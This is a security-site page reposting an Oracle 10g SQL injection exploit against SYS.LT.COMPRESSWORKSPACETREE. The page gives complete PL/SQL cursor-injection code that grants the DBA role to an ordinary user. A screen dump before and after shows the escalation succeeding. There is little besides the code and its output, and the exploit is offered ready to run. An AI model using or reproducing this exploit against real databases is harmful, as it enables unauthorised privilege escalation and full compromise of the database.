首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
来源:www.vfcocus.net 作者:Siddharth 发布时间:2009-07-03  

This is slightly modified version of: http://milw0rm.com/exploits/7677
This is based on cursor injection and does not need create function privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#-----------screen dump---------------------------------------------------#
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

SQL> DECLARE
  2  D NUMBER;
  3  BEGIN
  4  D := DBMS_SQL.OPEN_CURSOR;
  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme
diate ''grant dba to scott'';commit;end;',0);
  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
  8  end;
  9
 10
 11  /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          DBA                            NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO


Sid
www.notsosecure.com


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Safari 4.x JavaScript Re
·YourTube <= 2.0 Arbitrary Data
·fipsCMS Light version 2.1 arbi
·Almnzm 2.0 Remote Blind SQL In
·AudioPLUS 2.00.215 (.pls) Loca
·win32 xp-sp3 beep and exitproc
·ARD-9808 DVR Card Security Cam
·Joomla! versions prior to 1.5.
·Green Dam Remote Change System
·AudioPLUS 2.00.215 (.lst & .m3
·Soulseek versions 157 NS below
·Messages Library 2.0 Arbitrary
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved